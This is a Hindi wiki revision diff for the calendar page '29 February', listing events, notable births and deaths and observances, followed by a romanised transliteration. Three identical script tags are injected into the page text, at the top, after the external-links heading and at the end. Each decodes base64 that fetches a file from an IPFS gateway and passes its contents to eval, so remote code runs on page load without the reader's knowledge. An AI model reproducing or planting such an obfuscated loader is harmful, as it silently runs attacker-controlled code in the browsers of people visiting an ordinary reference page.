Difference between revisions of "29 फ़रवरी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(6 intermediate revisions by 4 users not shown)
Line 5: Line 5:
 
==29 फ़रवरी की महत्त्वपूर्ण घटनाएँ==
 
==29 फ़रवरी की महत्त्वपूर्ण घटनाएँ==
 
* [[2000]] - चेचेन्या के 99 प्रतिशत हिस्से पर रूसी सेनाओं का कब्ज़ा, रवाण्डा के प्रधानमंत्री पिरे सेलेस्टिन रविगेमा ने अपने पद से इस्तीफ़ा दिया।  
 
* [[2000]] - चेचेन्या के 99 प्रतिशत हिस्से पर रूसी सेनाओं का कब्ज़ा, रवाण्डा के प्रधानमंत्री पिरे सेलेस्टिन रविगेमा ने अपने पद से इस्तीफ़ा दिया।  
 +
* [[2004]] - [[अंतर्राष्ट्रीय अंतरिक्ष स्टेशन]] के यात्री मिशेल फ़ोएल का अलेक्ज़ेंडर केलरी अंतरिक्ष में उतरे, पर अंतरिक्ष सूट में ख़राबी के कारण पुन: वापस स्टेशन लौट गये।
 
* [[2008]] -
 
* [[2008]] -
 
**प्रसिद्ध साहित्यकार डॉ.बच्चन सिंह को अनुवाद के लिए वर्ष 2008 का साहित्य अकादमी पुरस्कार प्रदान किया गया।
 
**प्रसिद्ध साहित्यकार डॉ.बच्चन सिंह को अनुवाद के लिए वर्ष 2008 का साहित्य अकादमी पुरस्कार प्रदान किया गया।
 
**भारतीय मूल की 21 वर्षीय छात्रा ॠचा गंगोपाध्याय ने न्यूजर्सी में हुई 26वीं सालाना सौंदर्य प्रतियोगिता में मिस इंडिया यूएसए-2007 का खिताब जीता।
 
**भारतीय मूल की 21 वर्षीय छात्रा ॠचा गंगोपाध्याय ने न्यूजर्सी में हुई 26वीं सालाना सौंदर्य प्रतियोगिता में मिस इंडिया यूएसए-2007 का खिताब जीता।
 +
 
==29 फ़रवरी को जन्मे व्यक्ति==
 
==29 फ़रवरी को जन्मे व्यक्ति==
 +
* [[1932]] - [[सी. एस. शेषाद्री]] - [[भारत]] के एक प्रसिद्ध गणितज्ञ थे।
 +
* [[1904]] - [[रुक्मिणी देवी अरुंडेल]] -  [[भरतनाट्यम नृत्य|भरतनाट्यम]] की प्रसिद्ध भारतीय नृत्यांगना थीं।
 
* [[1896]] - [[मोरारजी देसाई]] - [[भारत]] के एक स्वाधीनता सेनानी और [[भारत]] के छ्ठे प्रधानमंत्री।
 
* [[1896]] - [[मोरारजी देसाई]] - [[भारत]] के एक स्वाधीनता सेनानी और [[भारत]] के छ्ठे प्रधानमंत्री।
  
 
==29 फ़रवरी को हुए निधन==
 
==29 फ़रवरी को हुए निधन==
 +
* [[1952]] - [[कुशवाहा कान्त]] - [[भारत]] के जाने-माने उपन्यासकार और नाटककार।
  
 
==29 फ़रवरी के महत्त्वपूर्ण अवसर एवं उत्सव==
 
==29 फ़रवरी के महत्त्वपूर्ण अवसर एवं उत्सव==
 
+
* राष्ट्रीय डि-एडिक्शन दिवस (मोरारजी देसाई का जन्म दिवस)।
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 
{{कैलंडर बाहरी कड़ियाँ}}
 
{{कैलंडर बाहरी कड़ियाँ}}

Latest revision as of 12:28, 20 July 2020

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

gregori kailandar ke anusar 29 faravari varsh ka 60 vaan din hai. sal mean abhi aur 306 din shesh haian.

29 faravari ki mahattvapoorn ghatanaean

  • 2000 - chechenya ke 99 pratishat hisse par roosi senaoan ka kabza, ravanda ke pradhanamantri pire selestin ravigema ne apane pad se istifa diya.
  • 2004 - aantarrashtriy aantariksh steshan ke yatri mishel foel ka alekzeandar kelari aantariksh mean utare, par aantariksh soot mean kharabi ke karan pun: vapas steshan laut gaye.
  • 2008 -
    • prasiddh sahityakar d aau.bachchan sianh ko anuvad ke lie varsh 2008 ka sahity akadami puraskar pradan kiya gaya.
    • bharatiy mool ki 21 varshiy chhatra rricha gangopadhyay ne nyoojarsi mean huee 26vian salana sauandary pratiyogita mean mis iandiya yooese-2007 ka khitab jita.

29 faravari ko janme vyakti

29 faravari ko hue nidhan

29 faravari ke mahattvapoorn avasar evan utsav

  • rashtriy di-edikshan divas (moraraji desaee ka janm divas).

bahari k diyaan

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>